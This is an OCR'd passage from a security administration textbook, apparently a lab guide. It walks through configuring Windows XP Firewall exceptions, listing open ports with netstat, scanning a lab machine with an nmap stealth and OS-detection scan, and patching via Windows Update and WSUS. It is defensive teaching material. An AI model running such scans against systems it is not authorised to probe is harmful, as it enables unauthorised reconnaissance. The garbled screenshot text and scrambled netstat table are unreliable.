< VMware Network Adapter WMnetl LAN or High-Speed Internet  Disabled, Firewalled WhMware Virkual Ethernet ... System
LAN or High-Speed Internet  Connected, Firewalled V14 Compatable Fast Eth... System
< UMware Network Adapter WMnets LAN or High-Speed Internet  Disabled, Firewalled WMware Virkual Ethernet ... System

|VIA Compatable Fast Ethernet Adapter

10|
Y

Right-click on Local Area Connection and select Properties. Select the Advanced tab

and click Settings.

On the General tab of the Windows Firewall dialog box, if Firewall is not enabled,

select On (Recommended).

*= windows Firewall |

General I Exoepl'mnsl Advamsdl

Windows Firewall helps protect your computer by preventing unauthonzed users
fram gaining access to your computer through the Intemet or a network.

@ {* DOn [recommended]

This setting blacks all outside sources from connecting to this
computer, with the exception of those selected on the Exceptions tab.
[ Don't allow exceptions
Select this when pou connect to public networks in less secure
locations, such as airports. You will not be notified when Windows

Firewall blocks programs. Selections on the Exceptions tab wil be
ignored.

@ " Dff (not recommended)

Awoid using this setting. Tuming off Windows Firewall may make this
computer more vulnerable to viuzes and intruders.

Windows Firewall i using pour domain settings.

Cancel

Select the Exceptions tab.

M
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P

2

7/
ING

Exceptions are ports on the firewall that are open to unsolicited inbound
frames. These inbound frames are trying to reach services provided on
the system behind the firewall. If there is no exception for a port, the
firewall simply rejects the unsolicited inbound frame. Your Exceptions tab
may contain different entries than the ones shown here. These entries
are the by-product of the installation of applications and services that are
recognized by Windows Firewall.

Changing the configuration of Windows Firewall may cause some services
and applications to fail. Further, it may leave your system vulnerable to
attack. If you are not sure of the proper configuration for the firewall, do
not make any changes to the firewall.

5. Notice that File And Printer Sharing is enabled, as is UPnP (Universal Plug and Play)
Framework. Highlight File And Printer Sharing and click Edit.

= Windows Firewall x|

General  Exceplions | Advanced |

‘windows Firewall is blocking incoming network connections, except for the
programs and services selected below, Adding exceptions allows some programs
ta work. better but might increase your zecurity risk,

Programs and Services:

Name =
File and Printer Sharing

[ Microsaft Office FrontPage

[J Remote 4ssistance

[ Remote Deskiop

LIPP Framework

[J*indows tedia Connect

[J*indows tedia Connect

[J*indows tedia Connect

[J*indows tedia Connect

[J*indows tedia Connect

[J*indows tedia Connect =l

Add Program... Add Port.. Edit.. Delete |

¥ Display a notification when ‘windows Firewall blocks a program

What are the risks of allowing exceptions?

Cancel |

Notice that Windows File And Printer Sharing utilizes UDP port 137
(NetBIOS Name Service), UDP port 138 (NetBIOS Datagram Service), TCP
port 139 (NetBIOS Session Service), and TCP port 445 (Microsoft Directory
Services). These services are required to support File And Printer Sharing
for NetBIOS/SMB (Microsoft and Samba) clients. By default, ports that

are opened are available to receive inbound frames from any source. To
restrict allowed inbound frames to one or a few systems, you can change
the scope of the exception.
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6. In the Edit A Service dialog box, click Change Scope.

You can restrict allowed inbound frames to My Network (subnet) only or
TE produce a custom list of IP addresses and ranges.

Leave the default Any Computer setting and click Cancel in the Change Scope dialog box.

5

To specify the set of computers for which this port o program iz unblocked, click an
option below.

To specify a custom list, twpe a list of IP addresses, subnets, or both, separated by
Commas.

% iy computer [including those on the [ntemet]
My netwark (subnet] anly

" Custom list:

Example: 192.168.114.201,192.168.114.201 /255,255, 255.0

Cancel

Click Cancel again in the Edit A Service dialog box.
7. Highlight other entries on the Exception list of Programs And Services and examine
the details by clicking Edit.

To identify applications and services related to port numbers, check out the
A TE excellent reference tool Port Authority: www.grc.com/PortDataHelp.htm.

8. Notice that (at least in our example) there is no exception for the web service. It is
currently being blocked by this firewall. To add an exception, select Add Port.

9. In the Add A Port dialog box, enter the following information:
= Name: Web Server
= Port Number: 80

Enable TCP and click OK.
=

Use these settings to open a port through “Windows Firewal. To find the port
number and pratocol, consult the documentation for the program or service you
want to use.

MName: IWEE Server

Fort rurmber: ISU

+ TCP  UDP

Ww/hat are the risks of opening a port?

Change scope.. Cancel
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%= windows Firewall x|
General Exceptions IAdvanced'

Windows Firewall is blocking incoming network connections, except for the
programs and services selected below. Adding exceptions allows some programs
ta wark better but might increase pour security risk.

Programs ahd Services:

Narne -
File and Printer Sharing

[ Microsoft Office FrontPage

[ Remate Assistance

[ Remote Desktop

UPHP Framewirk.

wieh Server

O'windows Media Connect

O'windows Media Connect

O'windows Media Connect

O'windows Media Connect

O'windows Media Connect =l

Add Pragram Add Port Edit Delete |

[V Display a notification when ‘windaws Firewall blocks a program

wthat are the risks of allowing exceptions?

Cancel |

10. Select the Advanced tab in the Windows Firewall dialog box. On this tab you can
enable or disable the firewall on any of the network interfaces in the system, configure
the logging details for the firewall, allow or drop ICMP frames (used for the PING
application—which is good—but also used in many attacks—which is bad!), and reset
the firewall to its default configuration, just in case you’re not sure what damage you
may have done.

= Windows Firewall x|

Generall Exceptions Advanced I

~ Metwork. Connection 5 ettings

Windows Firewall i enabled for the connections selected below. To add
exceptions for an individual connection, select it, and then click Settings:

Settings.. |

Whdware Metwork Adapter Vi net1
Whlware Metwork Adapter Vi netd

~ Secuity Logging

You can create a log file for troubleshooting purposes. Settings |

r ICHP
wiith Internet Control bMessage Protocal [ICHP), the Seftings |
computers on a network can share emor and status
information,

~ Default Settings

To restors all Wwindows Firewall settings to a default state, B actore Dsfaults |
click Restare Defaults.

Cancel |




Task 2.2: Managing Ports 45

11. Click OK to close the Windows Firewall properties dialog box.
You have now enabled and configured Windows Firewall. You have also enabled

inbound frames for Windows File And Printer Sharing, UPnP, and web services. Next,
youw’ll test the system for open ports.

Testing Open Ports
1. Open a command window by selecting Start » Run, typing cMD, and clicking OK.
2. Open Netstat, a command-line tool that interrogates the system for open ports,

connections, and protocol usage. Simply type netstat /? at the command prompt. You
should see the following:

C:\>netstat /7?

Displays protocol statistics and current TCP/IP network
connections.

NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v]
[interval]

-a Displays all connections and listening ports.

-b Displays the executable involved in creating each
connection or listening port. In some cases well-known
executables host multiple independent components, and in
these cases the sequence of components involved in
creating the connection or Tistening port is displayed.
In this case the executable name is in [] at the bottom,
on top is the component it called, and so forth until
TCP/IP was reached. Note that this option can be time-
consuming and will fail unless you have sufficient
permissions.

-e Displays Ethernet statistics. This may be combined with
the -s option.

-n Displays addresses and port numbers in numerical form.

-0 Displays the owning process ID associated with each
connection.

-p proto  Shows connections for the protocol specified by
proto; proto may be any of: TCP, UDP, TCPv6, or
UDPv6. If used with the -s option to display per-
protocol statistics, proto may be any of: IP, IPv6,
ICMP, ICMPv6, TCP, TCPv6, UDP, or UDPv6.

-r Displays the routing table.

-s Displays per-protocol statistics. By default, statistics
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interval

are shown for IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP,

and UDPv6; the -p option may be used to specify a subset
of the default.
When used in conjunction with -b, will display sequence

of components involved in creating the connection or

Tistening port for all executables.

Redisplays selected statistics, pausing interval
seconds between each display. Press CTRL+C to stop
redisplaying statistics. If omitted, netstat will

print the current configuration information once.

At the command prompt, type netstat -a -n -o.

This command displays all open ports and connections, places them in numeric or
alphabetic order, and shows the process ID (PID) that opened the port. Your results

should look something like this:

C:\>netstat -a -n -o

Active Connections

Proto Local Address

TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
TCP
ubp
ubp
ubp
ubp
ubpP
ubpP
ubp
ubp
ubp

O O O O O O o
O O O O O o

O O O O © © o

127.

192
192
192
192

o O O O ©O o o
o O O O O ©o o

O O O O ©O O © © o
O O O O O O © © o

127.
127.

.0.

0.

O O O O © © O o

.168.
.168.
.168.
1445
1500
11025
11026
11425
13456
14500
.1:123
.1:1027

121

:80
1135
1443
1445
12268
12869
.1:1047
.168.

Foreign

0
0
0.
0.
0
0

0
0
0.
0
0
0

.0.

0

0.

O O O ©O © o

O O O O © O o
O O O ©O © O o

Address

:0

.0.0.0:0

222.201:139 0.0.0.0:0

222.201:445

222.201:1161
222.201:2256

State
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING

LISTENING

LISTENING
LISTENING

PID
3984
3984
1060
3984
4
3984
1472
672
4

192.168.222.218:3274 ESTABLISHED 4
192.168.222.200:3268 CLOSE_WAIT 3740

192.168.222.218:445

R

E

B

%

¥

ESTABLISHED 4

__4
824
1252
1252
1252
3984
824
1188

824



Review some of these port numbers on the Port Authority website: www.grc. com/

ubp
ubp
ubpP
ubpP
ubp
ubp
ubp
ubpP
ubpP
ubp
ubp
ubp
ubp
ubpP
ubpP
ubp
ubp

127.
127.
127.
127.
127.
127.
127.
127.
127.
127.
127.
127.
127.
.168.
.168.
.168.
.168.

192
192
192
192

O 0O 0O OO0 0000 O o o o
O 0O 0O 0O 0O OO0 000 O o o
P R R R RRPRRRRRRRR

11041
11075
11160
11269
11419
11577
11900
12165
12229
12302
12373
12383
12603
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S

222.201:123 *:*
222.201:137 *:*
222.201:138 *:*
222.201:1900 *:*

PortDataHelp.htm.

Launch Task Manager by right-clicking on the taskbar and selecting Task Manager.

768
1600
3740
2752
2416
3204
1472
2908
660
3292
1884
556
1212
1188
4

4
1472

Select the Processes tab. Then choose View » Select Columns.

Enable the following columns:

PID (Process Identifier)
CPU Usage

CPU Time

Memory Usage

User Name

Base Priority

Click OK.

Select Columns

by

Select the columng that will appear on the Process page
of the Task Manager,

¥ | Imags Name ™ Page Faults Delta

¥ PID (Process Identifie) [ Yirtual Memory Size

¥ CPU Usage [~ Paged Pool
¥ CPU Time [~ Mon-paged Paol
¥ Memory Usage ¥ Base Priority

™ Memory Usage Delta ™ Handle Count
[~ Peak Memory Usage ™ Thread Count

™ Page Faults [~ GDI Objects
[~ USER Objects I~ 140 wwites

™ 1/0 Reads ™ 14D Wiite Bytes
™ 1/0 Read Bytes ™ 170 Other

™ Session ID ™ 140 Other Bytes
¥ User Mame:

Cancel

47
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7. Click on the PID column title to sort ascending by the process ID.

By comparing the PID value in the results from the netstat command to
TE the PID value in Task Manager, you can identify which processes opened
which ports, as well as who launched the process. This may help you
identify desirable versus undesirable processes and ports that your
system is running. Don’t worry if you don’t know how these processes

were launched; we'll cover that later in this phase.

-igix
File Options Wiew Help
Applications  Processes | Perfarmance I Metworking |
Image Nama | P [ User Hame [ cpu|  cpuTime | MemUsage [ Baser=]
Swstem Idle Process 0 SYSTEM 94 2113446 16k M
System 4 SVSTEM oo 00527 232K Horm
taskmaor.exe 128 Administrator 0z 0:00:10 2,384 K Hic
vmware-authd.exe 164 SYSTEM an 0:18:15 13,396 K Marm
wmnat.exe 300 SYSTEM aa 0:00:00 1,346 K Horm
\WISPTIS,ERE 320 Adminiskratar oo 0:00:00 3,440 K Hic
MsPM3P3v.exe 352 SVATEM oo 0:00:00 1,440k Morm
mme, exe 368 Administrabor on 0:00:02 1,948 K Morm
vmnetdhcp exe 496 SVSTEM [} 0:00:00 1,468 K Morm
iexplore.exe 556 Adminiskratar [} 0:00:21 6,554 K orm
iexplore.exe 660  Adminiskratar oo 0:00:29 3,580 K Morm
alg.exe 672 LOCAL SERVICE on 0:00:00 3,320K Morm
SMSS.BXE 696 SVSTEM on 0:00:00 3E4K Morm
C5FSS . EXE 744 SYSTEM 1] 0:03:09 820k Hic
winlogon, exe 7o  SYSTEM oo 0:00:13 10,268 K Hic
SErYICES BHE 812 SYSTEM oo 00114 0,488 K Horm
lsass.exe 824 SVSTEM on 0:01:59 7,768 K Morm__|
svchost.exe 992 SYSTEM aa 0:01:51 5,324k Morm
cidagmon, exe 1052 S¥STEM oo 0:00:43 472K La
svchost exe 1060 METWOREK SERVICE oo 0:00:02 4, 720K Horm
msdtc.exe 1112 NETWORK SERVICE oo 0:00:00 S012K Horm
MsMpEng. exe 1144 SVSTEM on 0:01:30 13,924 K Norm
svchost.exe 1188 SVSTEM aa 0:04:53 43,712 K Morm
iexplore.exe 1212 Administrator [} 0:00:01 3,646 K orm
SOUNDMAN,EXE 1224 Administrator oo 0:00:00 2,320k Horm
svchost exe 1252 METWOREK SERVICE oo 0:00:01 5126k Horm
jusched exe 1348 Administrator on 0:00:00 1,676 K Morm
Ciswe.exe 1408  SVSTEM oo 00128 448K Marm
DrgToDsc.exe 1412 Administrator aa 0:00:00 4,466 K Horm
cmd.exe 1432 Adminiskr atar ] 0:00:00 44K Norm
svchost exe 1472 LOCAL SERWICE on 0:00:01 7,080 K Norm
RxMon.exe 1432 Administrator on 0:00:14 10,352 K Morm
qttask.exe 15458 Administrator [} 0:00:00 1,745k Morm
spoolsy.exe 1600 SVSTEM 0z 0:00:24 7844 K Horm
1740 SVSTEM oo 0:00;00 32K Loz

clldaamon‘exe
4

AT

¥ show processes from all users

End Process

|Processes: [t |CPU Usage: 7%

|Commit Charge: 533M § 4902M

These “Testing Open Ports” processes, Steps 1 through 7, have given you a look at the
processes and ports that the system has available—a sort of self-perspective from behind
the firewall. Next you’ll take a look at how the system appears from outside the firewall

from an external system looking at the firewall.

1. On the second XP system, if you haven’t already downloaded Nmap version 5.50 (or the
latest version), download it from the website referenced earlier into a folder on the hard
drive. A reference guide for Nmap is available at http://nmap.org/book/man.htm1.

Install Nmap.

3. Open a command window.

At the C:\ prompt, enter nmap.
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This command will show you a quick summary of switches to use with Nmap. If you
get an error message that nmap is not a recognized command, change your focus to the
nmap installation directory, specified during the Nmap installation.

5. At the C:\ prompt, enter nmap -sS -0 <IP Address of the first XP system>.

The command is case sensitive. This command tells your machine to run a port
scan on the first XP system, utilize the Stealth Scan mode, and attempt to identify the
operating system. Here is the result of this scan on our system, named Shotgun, IP address
192.168.222.201:

C:\>nmap -sS -0 192.168.222.201

Starting Nmap 4.11 ( http://www.insecure.org/nmap )

at 2006-08-22 15:10 Eastern Standard Time

Warning: OS detection will be MUCH Tess reliable because you did
not find at Teast 1 open and 1 closed TCP port

Interesting ports on shotgun (192.168.222.201):

Not shown: 1677 filtered ports

PORT STATE SERVICE

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 00:0C:76:C0:21:BE (Micro-star International CO.)
Device type: general purpose

Running: Microsoft Windows NT/2K/XP

0S details: Microsoft Windows XP SP2

Nmap finished: 1 IP address (1 host up) scanned in 25.567 seconds

Notice that Ports 139 and 445 are open to support File And Printer Sharing and port 80
is open to support the website. No other ports are shown to be available externally because
of the firewall. If other ports are open, identify their source(s) and determine whether they
are desirable or undesirable. If undesirable, disable the application(s) and service(s) related
to these ports, and reconfigure your Windows Firewall as necessary to block these ports
correctly.

Criteria for Completion

You have completed this task when you have enabled and configured Windows Firewall in
your XP SP2 system; configured services through the firewall; tested the system internally
for services, ports, connections, and protocols; and tested the system from an external XP
system by running a port scanner against the firewall.
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Task 2.3: Patching the Operating System

Many appraisals of operating systems and applications estimate that there are typically
somewhere between 10 and 50 bugs (vulnerabilities) per 1,000 lines of code. Windows XP
has an estimated 40 million lines of code, and Windows 7 and Windows Vista reportedly
have approximately 50 million lines of code. These bugs are doorways for attackers to
take control of your systems, potentially compromising the confidentiality, integrity, and
availability of your information services. As these bugs are discovered and reported, the
software vendors produce patches to correct the vulnerability. This translates to the need
for a diligent and continuous patching routine to minimize the potential exposure of these
vulnerabilities in your operating system and applications.

Scenario

You are responsible for maintaining an XP 10-user workgroup in your corporate
environment. You are also responsible for maintaining 100 XP systems in an Active
Directory environment. You need to periodically spot-check patching processes, and you
must provide a patching routine to satisfy these maintenance needs.

Scope of Task

Duration
This task should take approximately 1 hour.

Setup

You will need to perform manual patching from the Windows Update website, configure
automatic patching for the workgroup, and configure automated patching of your domain
member workstations.

Caveat

Patches are intended to correct bugs in the operating system and applications. They replace
buggy system and application files with new, corrected versions. These versions are often
released with minimal, if any, testing in the real world. Patches can cause functioning
applications and services to fail. Patches should be tested in a lab environment prior to
implementation on corporate production systems.

Procedure

For the workgroup environment, where the users are local administrators, you can
configure Windows Updates to run automatically. You can run update checks manually to
perform spot-checking to ensure that the patching system is working correctly. Further, for
the Active Directory (AD) environment, you will install Windows Server Update Services
(WSUS) on a Windows Server 2003 and then deploy the approved patches via a Group
Policy Object (GPO) to your AD clients.
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Equipment Used

For this task, you must have:

= Windows XP SP2 system in Workgroup mode

= Windows XP SP2 as a domain member
= Windows Server 2003 SP1, domain controller with IIS and WSUS installed

= Internet connectivity

Details

Manual Patching of the Operating System

1. On the XP system in Workgroup mode, log on as a Local Administrator.

2. Launch Internet Explorer and ensure that you have Internet connectivity.
3. Select Tools » Windows Update.

TE

a Microsoft Update - Microsoft Internet Explorer

File Edt View Favorites | Tools Help
Mo WY - MalandNews 2 ;

Back - - x| (& Favorites {54
@ O L' Paop-up Blocker L3 Q

Address [&] http:fjupdate micro Manage Add-ons. . Fault, aspxiin=en-us

Synchronize

2-em- Jid 3

0 Windouws Messenger

Depending on the status of your system, Windows Update may need

to validate your copy of Windows XP by using the Windows Genuine
Advantage (WGA) program. If prompted to do so, follow the instructions
provided on the web page. Windows Update may also need to install

an ActiveX application to aid with the testing of the patch status of the
system. Allow this application to be installed.

4. Click Custom.

Options

Change settings
FAQ

Get help and suppart

Micresoft

Microsoft Update

: Welcome
to Microsoft Update urned ON.

Review your updsts history

EetmoB s Keep your computer up to date avaihle.,

Use administrator options

Search Microsoft,com fi

Your computer is sek to receive
notifications when new updates are

Check to see I you need updates For tWindows, your programs, your hardware or your devices

- Get high-priority updates
Geacommendeds

Pick a time to install updates.

X)) News
@ Select from optional and high-priority indows ¥ users: new security
Updates for Windows and other updates are now avalable for
prograns 5P1 2nd 5P2 orly

Concerned about privacy? When you check for updates, basic information about your computer,
et you, is used ko determine which updates your programs nesd. To learn more, see our privacy
statement.
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5.  Your system is now downloading from the Windows Update website a file called
MSSecure.xml, which is a list of all released patches. Windows Update will compare
the status of your system with this downloaded list. Anything your system is missing
from this list is presented for download in the resulting web page.

Search Microzoft. corn far:

Micresoft

Mi ft Update

M Ft Update H nn
' < / Turned DN.
to Microsoft Update

Options
™ s B Your computer is set ko receive

EVIEw your upaate history N notifications when new updates are
Restore hidden updates Checking for the latest updates for your computer... avalable,
Change settings [ | Pick a time ko install updates,
FAQ

et help and t 0

et help and suppor ) vew

Use administrator options
Windows XP users: new security

updates are now available For
SP1 and SPZ only

Notice in the left-hand column of this web page that Windows Update

A TE identifies High Priority patches, patches for the hardware in the system,
and patches for Microsoft software, as well as patches for Microsoft
Office if it is installed on the system.

Search Microsoft com for:

Micresoft
Microsoft Update

wswnrns T gJ Customize your resylts

) nstall Updates (1) Select High-Priority Updates

To help prokect your computer against security threats and performance problems, we strongly recommend you install all high-priority updates,

Select by Type

High Pricrity (13 Review and install updates Total: 1 updates, 295 KB, less than 1 minute

Software, Optional (0)

High-priority updates

Hardware, Optional (0}
Microsoft Windows Defender

Select by Product [¥ [ Definition Update 1.14,1654 8 for BETA Windows Defender (KE915597)

Windows (1)

Office 2003 {0}

Options

Review vour update history =]

6. Click Review And Install Updates. By expanding the details on the patch(es), you
may identify how valuable—or how dangerous—a patch may be to your system.
Additionally, some patches must be installed separately and the system must be
rebooted after installation. These details will be listed here.
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If after reviewing the details of the patch you are confident that the patch is desirable
and you don’t expect it to cause other processes to fail, confirm that the patch(es) are

selected by placing a check mark in the box to the left of the patch title(s), and then
click Install Updates.

Search Microsoft corn for:

Microsoft
Microsoft Update
Mi Ft Update Hy

icrosoft Update Home -?_“ C!ii :”I ig i‘:i “ |ﬁ§ ’lts
Review and Install Upcdates

Download size (total): 295 KB
Select by Type vt Wt Estimated time At your connection speed: less than 1 minuke
High Priority (1

Software, Optional (0} High-priority updates

Hardware, Optional (0 Microsoft Windows Defender

[¥ E Definition Update 1.14.1654.8 for BETA windows Defender (KB915597)

Select by Product - Download size: 295 KB , less than 1 minute

Windaws (1) Install this update to revise the definition files used to detect spyware and other potentially unwanted
software. Once you have installed this item, it cannot be removed. Details...

Office 2003 () I Don't show this update again

Options

Review vour update history |

A Windows Update progress dialog box is presented.

Installing Updates ﬁl

% The updates are being installed

Installation status:
Initializing installation... done! d
Ir;stalhg Definition Update 1.14, 1654.8 for BETA Windows Defender (KE215597) {update 1 of
D
=
Installing:

Cancel

Upon completion of the installation of the patch(es), you will be presented with a
completion dialog box. This dialog box may indicate that you need to reboot the
system. The patching is not complete until after rebooting in this case. If necessary,
you should reboot the system as soon as possible. Click OK.



54 Phase 2 = Hardening Systems

Installing Updates x|

% You have successfully updated your computer

Configure sutomatic updates

10. An installation summary is presented. Close this window to complete the manual
patching process.

M- n! Search Microsoft.com far:

osoft Update

Micrasoft LUpdate Home:

Options Review Your Installation Results
Review your update histary
Restore hidden updates e
Change settings

- @ Successful: 1

@ Failed: o
Gek help and suppart &) Remaining: 1]

Use administrakor options

@ Successful Updates

Microsoft Windows Defender

Definition Update 1,14, 1654.8 For BETA Windows Defender (KBE315597) e

Automated Patching in Workgroup Mode

1. Log on to the XP system in Workgroup mode as a Local Administrator.

For automated patching to take place correctly, the user of the system
TE must be a local administrator.

2. Right-click on My Computer and select Properties. In the resulting dialog box, select
the Automatic Updates tab.

You can also open this dialog box by selecting Control Panel » System » Automatic
Updates.
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Gerersl | ComputerName | Hadware | Advarced |
System Restore Automatic Updates | Remote

Windows can regularly check for important updates and install them for you.
[Turning on Autornatic Updates may autamatically update windows Update
soiftware first, befare any other updates )

How doss Automatic Updates work?

& Automatic [recommended)

Automatically download recommended updates for my computer
and install them:

Every day B I | 1000 fhd

" Download updates for me, but let me choose when to install them.

© Matify me but don't automatically downlaad of install them.

© Tum off Automatic Updates.

“four computer will be mare vulnerable unless pou install updates
regularly.
Install updates from the Windows Update Web site.

Offer updates again that |'ve previously hidden

oK I Cancel Apply

The options presented are as follows:

= Automatic (Recommended) — Automatically Download Recommended Updates
For My Computer And Install Them

= Download Updates For Me, But Let Me Choose When To Install Them
= Notify Me But Don’t Automatically Download Or Install Them
s Turn Off Automatic Updates

Select the first option. Specify that you want to perform this task every day at 10 a.m.

)’ If the system is turned off during a scheduled update, the update will be

P

&TE triggered and will occur when the system is turned on.

In the scenario, this configuration would need to be performed on each of
TE the 10 systems individually.

5.

Click OK.

Automated Patching in Domain Mode: Configuring WSUS

1.
2.

On the Windows Server 2003 domain controller, log in as a Domain Administrator.

You can download WSUS (currently version 3, SP2, approximately 85 MB) from
http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx.
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The user must have a Microsoft Live 1 login account, an MSN email
TE account, or a Passport account. Several Overview and Deployment guides
are available on this website.

3. WSUS utilizes IIS on the WSUS server for its administration interface. On the
Windows Server 2003 domain controller and now the WSUS server, open Internet
Explorer. Enter the URL http://1ocalhost/WSUSAdmin.

You will need to authenticate as a domain administrator. The following administrative
interface is presented:

;’ . I’V\ﬂndows Server
¥

Update Services Home  Updates Computers  Options

Welcome to Windows Server Update Services

¥ou can use Windows Server Update Services to quickly and reliably deploy the latest updates to your machines. Get the latest WSUS news from Micrasoft

;.l Status as of Wednesday, August 23, 2006 9:37 AM

Updates Synchronization Status

Total: 1117 Last synchronization: 8/23/2006 3:46 AM
Approved updates: 490 Last synchronization result:  Success

Updates not approved: Bl16 MNext synchronization: Manual

Declined updates: 11 Current skatus: Ide

Updates with computer errors: i] Synchronize now

Updates needed by computers: 0
Status of Downloads

Computers Updates needing files: 1}
Total: 0

Compurers with update errars: i]

Computers needing updates: 0

[ ToDolist

g Review Security and Critical updates
486 Security and Critical updates hawe not been approved for install.

@ Review other updates
130 non-critical, non-security-related updates have not been approved or declined.

@ Review synchronization settings
36 new products and 9 new classifications have been added in the past 30 days.

@ Configure Client Computers
‘four WSUS server currently shows no client computers have been set up to receive updates. For information about how to da this, see To set up 5 client
camputer,
¥, Use Secure Sockets Layer (SSL)
WSS has detected that you are not using Secure Sockets Layer (SSL). Microsoft recommends using S5L ko secure administration and client to server
communications For better security. For more information, see Using Secure Sockets Laver (SSLY.

2005 Microsoft Corporation. &ll rights reserved, Privacy Statement | Build 2.0.0,2472

|@ hittp: jfrio v susadming ’_ ,_ ,_ ’_ ’_ &) Trusted sites 4

4. In the upper-right corner, click Options. You are given three configuration choices:
= Synchronization Options
= Automatic Approval Options

= Computers Options
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! '3 Windows Server
! 'y} Update Services

Reports Complters

u Options

e Synchronization Options
‘You can manually synchronize servers, view synchronization status, specify procy server settings, and manage updates.

Automatic Approval Dptions
‘You can spedify how bo automatically approve installation or detection of updates for selected groups, and how ko approve revisions ko existing updates,

L., Computers Options
M ‘You can specify how ta assign computers to groups.

@ I O

Select Synchronization Options.

f J Windows Server

¥ Update Services

Home:

| | Synchronization Dptions

Tasks Schedule

HR Synchronize now ‘When you synchronize servers, you download new updates to this Windows Server Update Services server From Microsoft

Update ot an upstream Windows Server Update Services server, You can synchronize manually or set a schedule for daily
|l Tave settings automatic synchronization. Mote that when scheduling a daily synchronization from Microsoft Update, the synchronization will
begin within 30 minutes after the specified time,

& Synchronize manualky

" Synchronize daily at: 530 AM -

Synchronization Status

Last synchronization:
8/23i2006 3:46 AM
Last synchronization result:

Products and Classifications

Success ‘You can specify the products For which you want updates and the types of updates you want
Next synchronization: Products: Update classifications:
Manual Windows Server 2003 Critical Updates
Current status: windows XP Drivers

Feature Packs
Security Updates
Service Packs
Tools

Update Rollups
Updates

Change...

Ide Change. .

El

[&]Bone T [@ustedsites 7

Here you can choose to synchronize manually or set a daily
TE synchronization schedule. In the corporate environment, you’ll probably
want to set this for daily synchronization.

For this task, select Synchronize Manually.
In the next section, click the Change button under Products.

Select the operating systems and applications you are required to support in your
environment.

For this task, select Windows Server 2003 and Windows XP.
Click the Change button under Update Classifications.

57
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Select the types of updates you wish to provide through the WSUS system.

For this task, select all options.

Scroll down to the next sections.

If you are not connected to the Internet through a proxy server, deselect the Use A
Proxy Server When Synchronizing check box.

,,f J Windows Server
¥/ Update Services

B synchronization Options

Harne Updates

Tasks

Proxy Server

¥ Synchronize now
[ Save settings

Synchronization Status

These proxy-server settings apply only when this server synchronizes with an upstream server or Microsoft Update.

I~ Use a proxy server when synchronizing

server name: |

Port number: |80

Use user credentials to connect ko the proxy server
Last synchronization: = proxy

232006 3:46 AM
Last synchronization result:

User name: |

Domain: |

Success
Password: |
Next synchronization:

Manual = Allow basic authentication (passward is sent in clear kext)

Current status:

Idle Update Source

*ou can choose whether this Windows Server Update Services server synchronizes update infarmation fram Micrasoft Update or
From an upstream Windows Server Update Services server on your network.

& Synchronize from Microsoft Update
" Synchronize from an upstream Windows Server Update Services server

Server name; |

Fort number: 50

[T Use 551 when synchronizing update information
IF using 55L, ensure that the upstream Windows Server Update Services server is configured ko support S5L. The port
settings on this server must be configured to match the upstresm Windows Server Update Services server, For more
information, see Help.

Updats Files and Languages

You can specify whers to stors downloadsd Fles and which update languagss you wart to dowrlaad.

Advanced...
€ I I

=l
4

| @ Trusted stes

10.

1.

If you are connected to the Internet through a proxy server, enable that check box

and configure this section according to the configuration requirements of the proxy
server. If you are not sure of the proxy server configuration requirements, contact your
network administrator.

If you are not sure whether you are passing through a proxy server, first try this setting
with the Use A Proxy Server setting cleared.

In the Update Source section, choose either Synchronize From Microsoft Update or
Synchronize From An Upstream Windows Server Update Services Server.

For this task, select Synchronize From Microsoft Update.

In the Update Files And Languages section, click Advanced. Review and clear the
warning message.
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a Advanced Synchronization Options -- Web Page Dialog ll

~Update Files
‘fou can specify where to store the update files when yvou synchronize, Storing locally requires sufficient disk space.
" Store update files locally on this server

¥ | Dowinload update files bo bhis server only when updates are approved,
only infarmation about the updates wil be downloaded during symchronization,
I | Download express installation files,

Express installation files provide Faster download and installation on computers, but are larger and will increase
dovwnload times for your server,

" Do not stare updates locally; clients instal Fram Microsoft Updats:

rLanguages

If vou are storing update files locally, you can limit the updates downloaded to your Windows Server Update Services
server by language.

= Download only those updates that match the locale of Ehis server (English)
% Download updates in 2l languages, incuding new languages
" Download updates only in the selected lanquages

I~ arabic I French I™ | Horwegian

I™ | chinese (Hong Kang 5.4, R0 ™| German I™ | Falish

[T chinese (Simplfied) T Gresk I Porbuguese

I™ | chinese (Tradtional) I™ | Hebrew I™ | Partuguese (Brazil)

™ Ceech I Hurgatianm I Russian

™| Danish I Laliam [T spanish

I Dutch I Japanzse ™ swedish

™ Endlish I Japanese (MEC) ™| Turkish

I™ Finmish I™ | Korean

0K Cancel

|http:,l’,l’rioJWSUSAdmin,l’Managap’SynchronizationOptions,l’DataiIs.aspx |° Trusted sites

12. Here you can choose one of two options: Store Update Files Locally On This Server or
Do Not Store Updates Locally; Clients Install From Microsoft Update.

) Storing these updates locally currently requires about 6 GB of hard drive
A TE space on the volume that is holding the WSUS content.

With the setting Do Not Store Updates Locally; Clients Install From

TE Microsoft Update, the WSUS server is used only to configure the Approval
log and have clients download only the approved updates directly from
Microsoft Update.

As you can see, this server is configured with the setting Do Not Store Updates
Locally; Clients Install From Microsoft Update.

For this task, retain whichever setting the WSUS server was configured with (assuming
you have 6 GB+ of free space on the volume holding the WSUS content; otherwise, to
avoid consuming so much space on the local hard drive, select Do Not Store Updates
Locally On This Server).

13. If your system is configured to store update files locally on the server, the Languages
section is available. Choose only the languages you need to support in your
environment.
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If you choose to have clients download updates from Microsoft Update,

TE the list of available updates for administrative approval includes all
languages supported by Microsoft Update. Approve updates for only
the language(s) required by your environment.

14. Click OK. In the upper-left corner, in the Tasks section click Save Settings.

15. If your system requires it, you may need to synchronize your WSUS server before you
can proceed.

Synchronization can take an extended period of time, potentially several

TE hours, depending on your configuration choices and Internet connectivity
bandwidth. To synchronize your server, click Synchronize Now in the upper
left of the Tasks section.

16. Click Updates in the upper-right corner.

® % v 2 B

Home Updates  Reports  Computers  Options

updates
ct only
|Classfication |Rsleased - ‘Apprwa\ ﬂ
Critical Updates 8f22/2006 Detect only
Security Updates §/6/2006 Detect only
Security Updates §/8/2006 Detect only
ik | e sk, ee{?Ne  Dakack sanb

17. Review updates in the right-hand pane, observing the Details, Status, and Revisions below.

In a corporate environment, all updates should be tested for compatibility
TE in a lab environment, on a different network segment, prior to approving
and deploying to the production network.
